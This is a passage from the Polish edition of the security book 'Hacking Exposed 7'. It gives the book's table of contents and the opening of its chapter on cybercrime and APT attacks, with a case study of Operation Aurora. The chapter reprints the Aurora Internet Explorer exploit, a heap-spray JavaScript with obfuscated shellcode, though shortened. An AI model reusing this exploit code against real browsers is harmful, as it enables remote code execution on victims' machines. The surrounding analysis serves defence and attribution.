Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

 

 

 

Tytuł oryginalny: Hacking Exposed™ 7: Network Security Secrets & Solutions, Seventh Edition

Tłumaczenie: Tomasz Walczak

ISBN: 978-83-246-6867-0

Original edition copyright © 2012 by The McGraw-Hill Companies.

All rights reserved.

Polish edition copyright © 2013 by HELION SA

All rights reserved.

All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means,

electronic or mechanical, including photocopying, recording or by any information storage retrieval system,

without permission from the Publisher.

Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej

publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną,

fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje

naruszenie praw autorskich niniejszej publikacji.

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich

właścicieli.

Wydawnictwo HELION dołożyło wszelkich starań, by zawarte w tej książce informacje były kompletne

i rzetelne. Nie bierze jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym

ewentualne naruszenie praw patentowych lub autorskich. Wydawnictwo HELION nie ponosi również

żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce.

Wydawnictwo HELION

ul. Kościuszki 1c, 44-100 GLIWICE

tel. 32 231 22 19, 32 230 98 63

Cała książka jest do kupienia na

http://fraktalla.com/ksiazka/McClure-Stuart-ScambrayJoel-Kurtz-George/Vademecum-hackingu-7,62741001427KS

 

SPIS TREŚCI

O autorach ........................................................................................................................11

O współautorach ..............................................................................................................13

O recenzentach technicznych ........................................................................................17

Przedmowa .......................................................................................................................19

Wprowadzenie .................................................................................................................23

Cz I Badanie rodowiska

Studium przypadku .........................................................................................................28

Najważniejsza jest anonimowość, głupcze! ..................................................28

Tor-turowanie niewinnych .............................................................................29

 1. Footprinting .............................................................................................................33

Czym jest footprinting? ..................................................................................................34

Dlaczego footprinting jest niezbędny? ..........................................................35

Footprinting internetu ....................................................................................................35

Krok 1. Ustalenie zakresu działań ..................................................................35

Krok 2. Zadbaj o odpowiednie uprawnienia ................................................37

Krok 3. Publicznie dostępne informacje .......................................................37

Krok 4. WHOIS i wyliczanie DNS .................................................................55

Krok 5. Badanie nazw DNS ............................................................................64

Krok 6. Rekonesans sieci .................................................................................71

Podsumowanie .................................................................................................................75

 2. Skanowanie ............................................................................................................77

Ustalanie, czy system jest aktywny ................................................................................78

Odkrywanie hostów za pomocą protokołu ARP .........................................79

Odkrywanie hostów z wykorzystaniem protokołu ICMP ..........................81

Odkrywanie hostów za pomocą protokołów TCP i UDP ..........................86

 

6 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Ustalanie, które usługi działają lub oczekują na pakiety ............................................92

Rodzaje skanowania ........................................................................................93

Identyfikowanie działających usług TCP i UDP .........................................95

Wykrywanie systemu operacyjnego ............................................................................103

Identyfikowanie systemu na podstawie dostępnych portów ...................104

Aktywny fingerprinting stosu ......................................................................105

Pasywny fingerprinting stosu .......................................................................109

Przetwarzanie i przechowywanie danych ze skanowania ........................................111

Zarządzanie danymi ze skanowania za pomocą Metasploita ..................112

Podsumowanie ...............................................................................................................114

 3. Wyliczanie ............................................................................................................115

Fingerprinting usług .....................................................................................................117

Skanery luk .....................................................................................................................119

Proste przechwytywanie banerów ...............................................................................122

Wyliczanie popularnych usług sieciowych ................................................................125

Podsumowanie ...............................................................................................................193

Cz II Hakowanie punktów kocowych i serwera

Studium przypadku — międzynarodowa intryga .....................................................196

 4. Hakowanie systemu Windows ...............................................................................199

Przegląd ...........................................................................................................................201

Co zostało pominięte w tym rozdziale? ......................................................202

Ataki bez uwierzytelniania ...........................................................................................202

Ataki przez fałszowanie danych uwierzytelniających ...............................203

Zdalne ataki bez uwierzytelniania ...............................................................221

Ataki z uwierzytelnianiem ............................................................................................229

Zwiększanie uprawnień .................................................................................229

Zdobywanie i łamanie haseł .........................................................................231

Zdalna kontrola i „furtki” .............................................................................247

Przekierowywanie portów ............................................................................252

Zacieranie śladów ...........................................................................................254

Ogólne zabezpieczenia przed atakami z uwierzytelnianiem ....................257

Funkcje bezpieczeństwa w systemie Windows ..........................................................262

Zapora systemu Windows ............................................................................262

Automatyczne aktualizacje ...........................................................................262

Centrum zabezpieczeń ..................................................................................263

Zasady zabezpieczeń i zasady grupy ............................................................264

Microsoft Security Essentials ........................................................................267

Pakiet EMET ...................................................................................................267

Bitlocker i system EFS ...................................................................................267

Windows Resource Protection .....................................................................269

 

Spis treci 7

Poziomy integralności, kontrola konta użytkownika i tryb PMIE .........270

Funkcja DEP (ang. Data Execution Prevention) .......................................273

Windows Service Hardening ........................................................................273

Rozszerzenia związane z kompilatorem .....................................................278

Zakończenie — ciężar zabezpieczania systemu Windows .......................279

Podsumowanie ...............................................................................................................279

 5. Hakowanie systemu UNIX ......................................................................................283

Przejmowanie konta administratora ..........................................................................284

Krótkie wprowadzenie ..................................................................................285

Mapowanie luk ...............................................................................................285

Dostęp zdalny a dostęp lokalny ....................................................................286

Dostęp zdalny .................................................................................................................287

Ataki oparte na danych .................................................................................292

Gdzie jest moja powłoka? .............................................................................310

Popularne typy zdalnych ataków .................................................................315

Dostęp lokalny ...............................................................................................................335

Po włamaniu na konto administratora .......................................................................353

Przywracanie stanu po ataku rootkita .........................................................369

Podsumowanie ...............................................................................................................370

 6. Cyberprzestpstwa i ataki APT ...............................................................................373

Czym jest atak APT? .....................................................................................................375

Operacja Aurora .............................................................................................379

Grupa Anonymous ........................................................................................382

RBN ..................................................................................................................383

Czym ataki APT NIE są? ..............................................................................................384

Przykładowe popularne narzędzia i techniki z obszaru APT ..................................384

Typowe oznaki ataków APT ........................................................................................424

Podsumowanie ...............................................................................................................430

Cz III Hakowanie infrastruktury

Studium przypadku — WEP-owe przygody ..............................................................432

 7. Zdalna komunikacja i hakowanie pocze VoIP .....................................................437

Przygotowania do dzwonienia .....................................................................................439

Wardialing ......................................................................................................................441

Sprzęt ...............................................................................................................441

Kwestie prawne ..............................................................................................443

Dodatkowe koszty ..........................................................................................443

Oprogramowanie ...........................................................................................444

 

8 Vademecum hackingu. Skuteczna obrona sieci przed atakami

Skrypty do przeprowadzania ataków siłowych — nasz sposób ..............................459

Końcowe uwagi na temat skryptów do przeprowadzania

ataków siłowych ..........................................................................................470

Hakowanie systemów PBX ...........................................................................................472

Hakowanie poczty głosowej .........................................................................................476

Hakowanie sieci VPN ...................................................................................................482

Wprowadzenie do sieci VPN IPSec .............................................................483

Hakowanie sieci VPN opartych na oprogramowaniu firmy Citrix ........489

Ataki na technologię VoIP ...........................................................................................510

Atakowanie sieci VoIP ..................................................................................511

Podsumowanie ...............................................................................................................533

 8. Hakowanie sieci bezprzewodowych .......................................................................535

Wprowadzenie ...............................................................................................................537

Częstotliwości i kanały ..................................................................................537

Nawiązywanie sesji ........................................................................................538

Mechanizmy zabezpieczeń ...........................................................................539

Wyposażenie ..................................................................................................................541

Bezprzewodowe karty sieciowe ....................................................................542

Systemy operacyjne ........................................................................................543

Różne narzędzia .............................................................................................544

Odkrywanie i monitorowanie ......................................................................................546

Znajdowanie sieci bezprzewodowych .........................................................546

Podsłuchiwanie danych w sieciach bezprzewodowych ............................550

Ataki przez odmowę usługi ..........................................................................................552

Ataki na sieci z obsługą szyfrowania ...........................................................................553

WEP .................................................................................................................554

Ataki na sieci z uwierzytelnianiem ..............................................................................558

WPA-PSK .......................................................................................................559

WPA Enterprise .............................................................................................564

Podsumowanie ...............................................................................................................569

 9. Hakowanie sprztu ................................................................................................571

Dostęp fizyczny — przedostawanie się przez drzwi .................................................572

Hakowanie urządzeń .....................................................................................................579

Konfiguracje domyślne .................................................................................................584

Podatny na atak od wyjęcia z pudełka ........................................................584

Standardowe hasła .........................................................................................584

Bluetooth .........................................................................................................585

Inżynieria wsteczna sprzętu .........................................................................................585

Odwzorowywanie urządzenia ......................................................................586

Podsłuchiwanie danych przesyłanych magistralą .....................................590

 

Spis treci 9

Podsłuchiwanie interfejsu bezprzewodowego ...........................................592

Inżynieria wsteczna firmware’u ...................................................................594

Emulatory sprzętowe .....................................................................................599

Podsumowanie ...............................................................................................................602

Cz IV Hakowanie aplikacji i danych

 10. Hakowanie aplikacji sieciowych i baz danych .........................................................607

Hakowanie serwerów WWW ......................................................................................608

Przykładowe pliki ...........................................................................................610

Ujawnienie kodu źródłowego ......................................................................611

Ataki związane z przekształcaniem na postać kanoniczną ......................611

Rozszerzenia serwerów .................................................................................612

Przepełnienie bufora ......................................................................................615

Odmowa usługi ..............................................................................................616

Skanery luk serwerów WWW ......................................................................617

Hakowanie aplikacji sieciowych ..................................................................................618

Znajdowanie podatnych na atak aplikacji sieciowych

za pomocą wyszukiwarki Google (Googledorks) ...................................619

Przeszukiwanie sieci WWW .........................................................................621

Ocenianie aplikacji sieciowych ....................................................................623

Luki często występujące w aplikacjach sieciowych ...................................................636

Hakowanie baz danych .................................................................................................651

Wykrywanie baz danych ...............................................................................652

Luki w bazach danych ...................................................................................653

Inne uwagi .......................................................................................................668

Podsumowanie ...............................................................................................................670

 11. Hakowanie rozwiza mobilnych ...........................................................................671

Hakowanie Androida ....................................................................................................673

Wprowadzenie do Androida ........................................................................675

Hakowanie własnych urządzeń z Androidem ...........................................681

Hakowanie cudzych urządzeń z Androidem .............................................698

Android jako przenośna platforma do hakowania ....................................720

Zabezpieczanie urządzeń z Androidem ......................................................723

System iOS ......................................................................................................................725

Poznaj swojego iPhone’a ...............................................................................726

Jak bezpieczny jest system iOS? ...................................................................728

Jailbreaking — uwolnij moc! ........................................................................729

Hakowanie cudzych iPhone’ów — uwolniona moc! ................................735

Podsumowanie ...............................................................................................................753

 

10 Vademecum hackingu. Skuteczna obrona sieci przed atakami

 12. Ksiga zabezpiecze .............................................................................................755

Ogólne strategie .............................................................................................................757

Przenoszenie i usuwanie zasobów ...............................................................758

Podział zadań ..................................................................................................758

Uwierzytelnianie, autoryzacja i inspekcja ...................................................760

Stosowanie warstw .........................................................................................761

Dynamiczne wzbogacanie ............................................................................762

Kontrolowane awarie ....................................................................................763

Zasady i szkolenia ..........................................................................................763

Proste, tanie i łatwe ........................................................................................764

Przykładowe scenariusze ..............................................................................................765

Scenariusze związane z komputerami stacjonarnymi ...............................765

Scenariusze związane z serwerem ................................................................766

Scenariusze związane z siecią .......................................................................772

Scenariusze związane z aplikacjami sieciowymi i bazami danych ..........774

Scenariusze związane z rozwiązaniami mobilnymi ...................................775

Podsumowanie ...............................................................................................................776

Dodatki

 A Porty ....................................................................................................................781

 B Dziesi najwaniejszych luk bezpieczestwa ........................................................789

 C Odmowa usugi i rozproszone ataki przez odmow usugi .......................................793

Zabezpieczenia ...............................................................................................................797

 S Skorowidz .............................................................................................................801

 

ROZDZIA 6.

Cyberprzestpstwa

i ataki APT

 

374 Vademecum hackingu. Skuteczna obrona sieci przed atakami

ojęcie APT (ang. Advanced Persistant Threats) ostatnio znacznie zyskało na

popularności. APT oznacza powtarzający się nieuwierzytelniony dostęp do

korporacyjnych sieci. Określenie to trafiło na nagłówki gazet i było powodem

wielu bezsennych nocy licznych informatyków odpowiedzialnych za bezpieczeństwo.

Jednak samo zagadnienie nie jest niczym nowym. Jeśli byłeś jednym ze szczęściarzy,

którzy w 1999 roku kupili pierwsze wydanie książki Hacking Exposed, i otworzyłeś

tylną okładkę, mogłeś zobaczyć schemat zatytułowany Anatomy of a Hack. Pokazano

na nim prosty proces metodycznego namierzania i atakowania sieci przez hakerów.

Choć na diagramie nie przedstawiono eksploitów typu zero-day, omówiono je szczegółowo

w tekście książki. Opis ten w połączeniu ze schematem Anatomy of a Hack

był zapowiedzią tego, co później nazwano atakami APT.

Obecnie pojęcie APT stosuje się często niepoprawnie, określając tym mianem

popularne szkodliwe oprogramowanie, np. robaki i trojany oparte na skomplikowanych

technikach lub zaawansowanych rozwiązaniach programistycznych, które pozwalają

napastnikom ominąć programy antywirusowe i inne aplikacje zabezpieczające

oraz działają w systemie przez długi czas. W rzeczywistości ataki APT polegają na

zastosowaniu przez hakera zaawansowanych narzędzi do włamania się do systemu,

przy czym mają pewną dodatkową cechę — są przeprowadzane w jakimś ważnym

celu. Większość hakerów chce uzyskać dostęp do systemu, wykonać zaplanowane

operacje i usunąć określone dane. W atakach APT celem jest wykorzystywanie systemu

przez długi czas. Pamiętaj jednak, że atak APT nie musi być ani zaawansowany (ang.

advanced), ani trwały (ang. persistent).

Ataki APT są przeciwieństwem oportunistycznych włamań popularnych na

początku obecnego wieku (wykorzystywano w nich techniki w rodzaju hakowania za

pomocą zapytań do wyszukiwarki, tzw. Google hacking, pozwalających znaleźć niezabezpieczone

maszyny). Ataki APT są zaplanowane, wymierzone w konkretny cel

i prowadzone przez zorganizowane grupy oraz mają przynieść określone skutki (w tym

stały dostęp). Wykrycie konkretnych narzędzi często pozwala podejrzewać, że ma miejsce

atak APT (choć nie daje takiej pewności), ponieważ różni napastnicy stosują

w trakcie działań podobne pakiety. Może to pomóc powiązać zagrożenie z konkretną

grupą.

Na ogólnym poziomie ataki APT można podzielić na dwie kategorie w zależności

od zamiarów napastników. Pierwsza grupa koncentruje się na działalności przestępczej

i jest zainteresowana danymi osobowymi oraz (lub) finansowymi, a także posiadanymi

przez firmy informacjami, które można wykorzystać do podszywania się,

oszustw finansowych lub kradzieży. Druga grupa zajmuje się wywiadem gospodarczym

lub szpiegostwem na rzecz państw (czasem obszary te zachodzą na siebie).

W ramach tych działań są przejmowane zastrzeżone i zwykle niedostępne publicznie

informacje, np. własność intelektualna i tajemnice handlowe. Pozwala to wprowadzać

P

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 375

na rynek konkurencyjne produkty i usługi oraz projektować strategie rywalizacji

z okradzionymi firmami lub reagowania na możliwości tych organizacji.

Ataki APT mogą być wymierzone w organizacje społeczne, polityczne, rządowe

lub przemysłowe — i często są. Informacje dają władzę, a dostęp do danych na temat

konkurencji i kontrolowanie ich zapewnia dużo możliwości. To właśnie jest ostateczny

cel ataków APT — zdobyć i utrzymać dostęp do ważnych dla napastników informacji.

Niezależnie od tego, czy działania są prowadzone w ramach wspieranego przez państwo

szpiegostwa przemysłowego lub zorganizowanej przestępczości, czy przez niezadowolone

grupy społeczne, metody i techniki ataków APT są bardzo podobne,

dlatego można je rozpoznać i odróżnić od przypadkowych infekcji komputerów szkodliwym

oprogramowaniem.

Warto powtórzyć ten ważny punkt — ataki APT to nie szkodliwe oprogramowanie.

W wielu sytuacjach napastnicy nawet nie stosują oprogramowania tego rodzaju,

przy czym niektórzy hakerzy lubią posługiwać się pewnymi narzędziami, co pomaga

analitykom i śledczym powiązać ataki z określonymi grupami (a także znaleźć pozostałości

i dowody operacji wielokrotnie przeprowadzanych przez napastników). Ataki

APT to działania prowadzone przez zorganizowaną grupę w celu uzyskania (trwałego)

dostępu do konkretnego systemu i kradzieży informacji dla potrzeb finansowych,

społecznych, przemysłowych, politycznych lub konkurencyjnych.

CZYM JEST ATAK APT?

Pojęcie Advanced Persistent Threat (APT; zaawansowane trwałe zagrożenie) zostało

utworzone przez analityków z amerykańskich Sił Powietrznych w 2006 roku. Opisuje

ono trzy aspekty ataków związane z profilem, zamiarami i strukturą grupy napastników.

 Zaawansowane. Napastnik jest biegły w metodach cyberataków i technikach

administracyjnych. Potrafi rozwijać niestandardowe eksploity i narzędzia.

 Trwałe. Napastnik ma długoterminowe cele i stara się je osiągnąć, unikając

przy tym wykrycia.

 Zagrożenie. Napastnicy są zorganizowani, mają duże środki, motywację

i możliwości.

Ataki APT, jak wcześniej wspomnieliśmy, to działania zorganizowanej grupy,

która ma nieuwierzytelniony dostęp do systemów informacyjnych i łączy komunikacyjnych

oraz może nimi manipulować. Celem jest kradzież cennych informacji,

które można wykorzystać w różny sposób. Ataki APT są związane ze szpiegostwem,

wywiadem gospodarczym i brudnymi sztuczkami. Są formą szpiegostwa, która daje

dostęp do cyfrowych zasobów. Napastnicy starają się usunąć przeszkody na drodze

do uzyskania tego dostępu, dlatego rzadko uciekają się do sabotażu. Hakerzy mogą

jednak posługiwać się różnymi technikami zacierania śladów działań w dziennikach

 

376 Vademecum hackingu. Skuteczna obrona sieci przed atakami

systemowych i mogą nawet uszkodzić system operacyjny lub system plików. Narzędzia

APT różnią się od innego szkodliwego oprogramowania, ponieważ wykorzystują

normalne funkcje systemu operacyjnego i są widoczne w systemie plików.

Grupy przeprowadzające ataki APT nie chcą, aby ofiara wykryła wykorzystywane

przez nie narzędzia lub techniki. Dlatego nie chcą blokować ani zakłócać normalnego

działania systemu w atakowanych hostach. Zamiast tego stosują dyskretne techniki

ataku, penetracji, rekonesansu, poruszania się w poziomie, administrowania i wyprowadzania

danych. Techniki te zazwyczaj odzwierciedlają podobne administracyjne

lub operacyjne działania atakowanej firmy, choć odkryto, że niektóre grupy stosują

w swoich operacjach konkretne narzędzia. W niektórych sytuacjach ataki APT pomogły

zaatakowanym firmom (nieświadomie) zabezpieczyć systemy przed szkodliwym

oprogramowaniem lub atakami APT ze strony innych grup.

Choć stosowane techniki są dyskretne, nie dotyczy to pozostałości po przeprowadzonych

działaniach. Np. najpopularniejszą metodą uzyskiwania dostępu do docelowych

sieci w atakach APT jest ukierunkowany phising (ang. spear-phishing). Technika

ta jest oparta na e-mailach, dlatego — często w wielu miejscach — pozostają

ślady po wiadomościach, zastosowanej metodzie ataku oraz adresach i protokołach

wykorzystywanych do komunikowania się z komputerami napastników. E-maile przesyłane

w ukierunkowanym phishingu mogą obejmować szkodliwe oprogramowanie,

które próbuje zaatakować aplikacje z komputera użytkownika. Mogą też kierować

użytkownika (na podstawie pewnych informacji identyfikujących jego tożsamość) na

serwer udostępniający niestandardowe szkodliwe oprogramowanie, które umożliwia

hakerom dalsze działania w ramach ataku APT.

Napastnicy zwykle wykorzystują wcześniej przejęte sieci komputerów jako podstawione

systemy, aby ukryć się za nimi, gdy przesyłają instrukcje i sterują atakiem.

Jednak adresy podstawionych serwerów mogą okazać się ważnymi poszlakami pomocnymi

przy ustalaniu tożsamości danej grupy. Także systemy pocztowe używane do

ukierunkowanego phishingu, a nawet stosowane eksploity (zwykle programy do instalowania

trojanów — ang. trojan dropper) mogą działać w modelu „płatności za instalację”

lub „leasingu”. Mimo to podobne adresy, metody i eksploity w połączeniu

z innymi informacjami ustalonymi w trakcie śledztwa często pozwalają powiązać

z atakiem konkretne grupy.

Inne popularne techniki stosowane w atakach APT to wstrzykiwanie kodu w SQL-u

w docelowych witrynach, posługiwanie się „metaeksploitami” serwerów WWW, phishingiem,

eksploitami aplikacji używanych w sieciach społecznościowych, a także standardowe

metody z obszaru inżynierii społecznej, np. podawanie się za użytkownika

w rozmowach z pomocą techniczną, podrzucanie zainfekowanych pendrive’ów, rozdawanie

zainfekowanego sprzętu lub oprogramowania, a w skrajnych przypadkach

tradycyjne szpiegowanie przez zwykłych lub kontraktowych pracowników. Ataki

APT zawsze obejmują pewne aspekty inżynierii społecznej. Inżynieria społeczna —

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 377

niezależnie od tego, czy ogranicza się do korzystania z adresów e-mail z publicznych stron

internetowych, czy polega na szpiegostwie korporacyjnym przez pracowników kontraktowych

pozwala poznać cel i pomaga napastnikom opracować strategie dostępu

do docelowych systemów operacyjnych, wykorzystania luk i wydobycia danych.

Ataki APT zawsze obejmują kilka etapów, po których pozostają ślady. Oto te fazy:

1. Namierzanie. Napastnicy zbierają informacje o celu ze źródeł publicznych lub

prywatnych i sprawdzają metody, które mogą pomóc w uzyskaniu dostępu.

Posługują się przy tym skanowaniem luk (przez testy bezpieczeństwa aplikacji

i ataki typu DDoS), inżynierią społeczną lub ukierunkowanym phishingiem.

Celem może być konkretna firma lub jej partner (który może umożliwić pośredni

dostęp do docelowej organizacji przez sieci biznesowe).

2. Uzyskanie dostępu i włamanie. Napastnicy uzyskują dostęp i ustalają

najwydajniejsze lub najskuteczniejsze metody wykorzystania systemów

informacyjnych i stanu zabezpieczeń docelowej organizacji. Na tym etapie

określają dane identyfikacyjne zaatakowanego hosta (adres IP, nazwę DNS,

wyliczone udziały NetBIOS-a, adresy serwerów DNS i DHCP, system

operacyjny itd.), a także w miarę możliwości zbierają dane uwierzytelniające

i profile, co pomaga w dalszych włamaniach. Napastnicy mogą próbować ukryć

swoje zamiary, instalując programy typu rogueware lub inne szkodliwe

oprogramowanie.

3. Rekonesans. Napastnicy wyliczają udziały sieciowe, odkrywają architekturę

sieci, usługi tłumaczenia nazw, kontrolery domeny, a także sprawdzają,

czy usługi i administrator mają uprawnienia dostępu do innych systemów

i aplikacji. Hakerzy mogą próbować włamać się na konta Active Directory

lub lokalnych administratorów z uprawnieniami do domeny. Napastnicy często

starają się ukryć działania przez wyłączenie programu antywirusowego

i dzienników systemowych (zjawiska te mogą wskazywać na włamanie).

4. Poruszanie się w poziomie. Gdy napastnicy ustalili już sposoby poruszania

się po systemach za pomocą danych uwierzytelniających oraz zidentyfikowali

cele (łatwe do zaatakowania lub dostosowane do zamiarów), zaczynają

przechodzić w poziomie do innych hostów z sieci. Etap ten nie wymaga

stosowania szkodliwego oprogramowania ani specjalnych aplikacji. Wystarczą

rozwiązania dostępne w systemach operacyjnych przejętych hostów, np. powłoka

poleceń, instrukcje NetBIOS-a, usługi terminalowe systemu Windows, sieci

VNC lub inne podobne narzędzia używane przez administratorów sieci.

5. Zbieranie i wyprowadzanie danych. Napastników interesują informacje —

niezależnie od tego, czy służą do dalszego namierzania ofiar, utrzymania dostępu

lub innych celów, hakerzy chcą zdobyć i ukraść dane. Napastnicy często tworzą

punkty zbierania danych” i wyprowadzają informacje za pomocą

podstawionych sieci pośredniczących. Czasem stosuje się też niestandardowe

 

378 Vademecum hackingu. Skuteczna obrona sieci przed atakami

techniki szyfrowania (i szkodliwe oprogramowanie), aby utrudnić zrozumienie

plików danych i powiązanych połączeń, przez które są wyprowadzane

informacje. W wielu sytuacjach napastnicy wykorzystują istniejące

oprogramowanie do tworzenia kopii zapasowych i inne narzędzia

administracyjne, którymi posługują się administratorzy sieci i systemów

w zaatakowanej organizacji. Wyprowadzanie danych odbywa się fragment

po fragmencie lub w dużych porcjach. Zależy to od tego, czy napastnikowi

się spieszy i czy jego zdaniem firma potrafi wykryć kradzież danych.

6. Administrowanie i konserwacja narzędzi. Innym celem w atakach APT jest

utrzymanie dostępu. Wymaga to administrowania narzędziami (szkodliwym

oprogramowaniem i potencjalnie niepożądanymi lub przydatnymi programami,

np. pakietem Sysinternals) i danymi uwierzytelniającymi oraz ich

konserwowania. Napastnicy przygotowują kilka różnych dróg zdalnego dostępu

do sieci oraz tworzą flagi i wyzwalacze informujące o zmianach w architekturze

systemu. Pozwala to na podjęcie odpowiednich działań, takich jak namierzanie

nowych celów i włamywanie się do nich, a także przeprowadzanie pozornych

ataków z wykorzystaniem szkodliwego oprogramowania, aby odwrócić uwagę

pracowników firmy. Napastnicy zwykle próbują usprawniać metody dostępu,

by były jak najbardziej zbliżone do działań standardowych użytkowników.

Niepożądane jest ciągłe poleganie na specjalnych narzędziach i szkodliwym

oprogramowaniu.

Jak wspomnieliśmy, po próbach dostępu mogą pozostać e-maile, wpisy w dziennikach

serwera WWW i na ścieżkach komunikacyjnych oraz inne ślady związane

z zastosowanymi technikami. Także rekonesans i poruszanie się w poziomie pozostawiają

artefakty wynikające z nadużywania danych uwierzytelniających (reguł)

lub tożsamości (ról). Zwykle ślady te znajdują się w dziennikach zdarzeń z obszaru

bezpieczeństwa i dziennikach historii aplikacji. Wyprowadzanie danych pozostawia

artefakty związane z protokołami i adresami w dziennikach zapory, w dziennikach

systemów IDS (na poziomie hostów i sieci), dziennikach systemu zapobiegania wyciekaniu

danych, dziennikach historii aplikacji oraz dziennikach serwerów WWW.

Wspomniane ślady zwykle są dostępne w aktywnych systemach plików (jeśli administrator

wie, gdzie i czego szukać), jednak czasem można je odkryć tylko w ramach

sądowych badań zaatakowanych systemów.

Techniki stosowane w atakach APT zasadniczo nie różnią się od technik administracyjnych

i operacyjnych używanych w korporacyjnych systemach informatycznych.

Dlatego nieuprawniony napastnik pozostawia w systemie plików i innych dziennikach

te same ślady co upoważniony użytkownik. Jednak nieuprawnione osoby muszą

przeprowadzać eksperymenty lub korzystać z dodatkowych narzędzi, aby uzyskać

dostęp i wykorzystać system. Dlatego pozostają po nich pewne anomalie, które nie

występują w danych dotyczących uprawnionych użytkowników.

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 379

W ostatnich pięciu latach wykryto kilka długotrwałych ataków APT przeprowadzonych

przez nieznanych sprawców na różne jednostki przemysłowe i rządkowe

z całego świata. Ataki te otrzymały nazwy nadane przez śledczych (Aurora, Nitro,

ShadyRAT, Lurid, Night Dragon, Stuxnet i DuQu). Każda z akcji obejmowała działania

operacyjne, w tym dostęp, rekonesans, poruszanie się w poziomie, manipulowanie

systemami informatycznymi i wyprowadzanie prywatnych lub zastrzeżonych

danych. W trzech następnych podpunktach omawiamy trzy ataki APT.

Operacja Aurora

Popularność 1

Łatwość przeprowadzenia 1

Szkodliwość 10

Ocena zagrożenia 4

W 2009 roku amerykańskie firmy z branży technologicznej i zbrojeniowej stały się

ofiarą włamania do sieci oraz systemów zarządzania konfiguracją oprogramowania.

Doprowadziło to do kradzieży wysoce poufnych informacji. Z firm Google, Juniper,

Adobe i przynajmniej 29 innych przez aż sześć miesięcy wyciekały tajemnice handlowe

i ważne dla konkurencji dane. Dopiero wtedy organizacje wykryły kradzież

i podjęły działania w celu powstrzymania ataku APT.

Napastnicy uzyskali dostęp do sieci ofiar za pomocą e-maili z ukierunkowanym

phishingiem wysyłanych do pracowników firm. E-maile te obejmowały odnośnik do

tajwańskiej witryny, w której znajdował się szkodliwy kod w JavaScripcie. Gdy odbiorca

wiadomości kliknął odnośnik i otworzył witrynę, kod wykorzystywał lukę w przeglądarce

Internet Explorer, co pozwalało na zdalne wykonywanie kodu przez dostęp do

częściowo zwolnionej pamięci. Szkodliwy kod nie był wykrywany przez programy

antywirusowe. Działał przez wstrzykiwanie kodu powłoki z następującymi instrukcjami:

<html><script>var sc = unescape("%u9090%... ...%ubcb9%ub2f6%ubfa8%u00d8");

var sss = Array(826, 679, ... ...735, 651, 427, 770, 301, 805, 693, 413, 875);

var arr = new Array;

for (var i = 0; i < sss.length; i ++){

arr[i] = String.fromCharCode(sss[i]/7); }

var cc=arr.toString();cc=cc.replace(/ ,/ g, "");

cc = cc.replace(/@/g, ",");

eval(cc);

var xl = new Array();

for (i = 0; i < 200; i ++){

xl[i] = document.createElement("COMMENT");

xl[i].data = "abc";

};

var el = null;

 

380 Vademecum hackingu. Skuteczna obrona sieci przed atakami

function ev1(evt){

el = document.createEventObject(evt);

document.getElementById("sp1").innerHTML = "";

windows.setInterval(ev2, 50);

}

function ev2(){

p = "

\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c

0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\

u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\u0c

0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\

u0c0d";

for (i = 0; i < xl.length; i ++ ){

xl[i].data = p;

};

var t = el.srcElement;

}

</script><span id="sp1"><IMG SRC="aaa.gif" onload="evl(event)">

</span></body></html>

W javascriptowym eksploicie wykorzystano prostą procedurę obliczania sumy CRC

(ang. Cyclic Redundancy Checking) z 16 stałymi. Przedstawiono ją poniżej.

unsigned cal_crc(unsigned char *ptr, unsigned char len) {

unsigned int crc;

unsigned char da;

unsigned int crc_ta[16]={

0x0000,0x1021,0x2042,0x3063,0x4084,0x50a5,0x60c6,0x70e7,

0x8108,0x9129,0xa14a,0xb16b,0xc18c,0xd1ad,0xe1ce,0xf1ef,

}

crc=0;

while(len--!=0) {

da=((uchar)(crc/256))/16;

crc<<=4;

crc^=crc_ta[da^(*ptr/16)];

da=((uchar)(crc/256))/16;

crc<<=4;

crc^=crc_ta[da^(*ptr&0x0f)];

ptr++;

}

return(crc);

}

Niektórzy analitycy uważają, że kod metody wskazuje na to, iż jej autorem jest

chińskojęzyczny programista. Pomysł ten oparto na dwóch ważnych odkryciach:

(1) kod obliczania sumy CRC przypuszczalnie pochodzi z pracy opublikowanej

w uproszczonym chińskim; (2) sześć umieszczonych w kodzie powiązanego trojana

adresów IP, z których wysyłano instrukcje i kontrolowano system, służyło do uzyskiwania

zdalnego dostępu i zarządzania przejętymi komputerami połączonymi

 

Rozdzia 6. Cyberprzestpstwa i ataki APT 381

z maszynami z Tajwanu (choć nie z Chin). Niektórzy analitycy podważali te dowody,

a zwłaszcza pierwszy z nich, ponieważ zastosowanej techniki używano w algorytmach

w programach osadzonych przynajmniej od końca lat 80. ubiegłego wieku. Wykorzystano

ją nawet jako wzorcową metodę programowania NetBIOS-a. Więcej informacji

na ten temat znajdziesz na stronie www.amazon.com/Programmers-Guide-Netbios-

-David-Schwaderer/dp/0672226383/ref=pd_sim_b_1. Omawiane szkodliwe oprogramowanie

zostało nazwane Hydraq. Napisano też sygnatury, które pozwalają wykrywać

je w programach antywirusowych.

Luka w przeglądarce Internet Explorer umożliwiła napastnikom automatyczne

umieszczanie na komputerach ofiar trojanów pobierających inne programy, które

